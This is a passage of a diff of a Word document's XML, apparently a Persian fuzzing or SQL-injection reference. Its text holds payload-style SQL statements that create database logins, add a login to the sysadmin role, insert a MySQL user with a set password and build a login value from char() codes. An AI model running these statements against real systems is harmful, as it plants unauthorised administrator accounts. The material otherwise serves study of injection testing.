         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>exec</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>sp_addlogin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">PASSWORD('pass123')) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'name' , 'password' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GRANT CONNECT TO name; GRANT RESOURCE TO name; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>exec</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70)   + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>sp_addsrvrolemember</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'name' , 'sysadmin' </w:t>
-      </w:r>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">INSERT INTO </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>mysql.user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (user, host, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) VALUES ('name', 'localhost', </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>PASSWORD(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'pass123')) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">GRANT CONNECT TO name; GRANT RESOURCE TO name; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70)   + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId21"/>
+      <w:headerReference w:type="default" r:id="rId19"/>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
   </w:body>
 </w:document>
-</file>
-
-<file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
-<w:comments xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
-  <w:comment w:id="1" w:author="MehDi Hoseini" w:date="2018-06-27T14:14:00Z" w:initials="MH">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-        <w:rPr>
-          <w:rFonts w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Fuzz = </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>نامشخص</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-        <w:rPr>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">For </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>example: to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>day is a hot day is a fuzzy sentence, because it may be cold for someone else</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-        <w:rPr>
-          <w:rFonts w:hint="cs"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-  </w:comment>
-  <w:comment w:id="2" w:author="MehDi Hoseini" w:date="2018-06-27T15:29:00Z" w:initials="MH">
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CommentText"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:annotationRef/>
-      </w:r>
-    </w:p>
-  </w:comment>
-</w:comments>
-</file>
-
-<file path=word/commentsExtended.xml><?xml version="1.0" encoding="utf-8"?>
-<w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
-  <w15:commentEx w15:paraId="3DCF4658" w15:done="0"/>
-  <w15:commentEx w15:paraId="53CA6706" w15:paraIdParent="3DCF4658" w15:done="0"/>
-</w15:commentsEx>
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
@@ -41620,7 +38899,6 @@
     <w:pPr>
       <w:pStyle w:val="Header"/>
       <w:rPr>
-        <w:rFonts w:hint="cs"/>
         <w:lang w:bidi="fa-IR"/>
       </w:rPr>
     </w:pPr>
@@ -43031,14 +40309,6 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
-</file>
-
-<file path=word/people.xml><?xml version="1.0" encoding="utf-8"?>
-<w15:people xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
-  <w15:person w15:author="MehDi Hoseini">
-    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="bc1b1c93d636c341"/>
-  </w15:person>
-</w15:people>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -43439,6 +40709,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
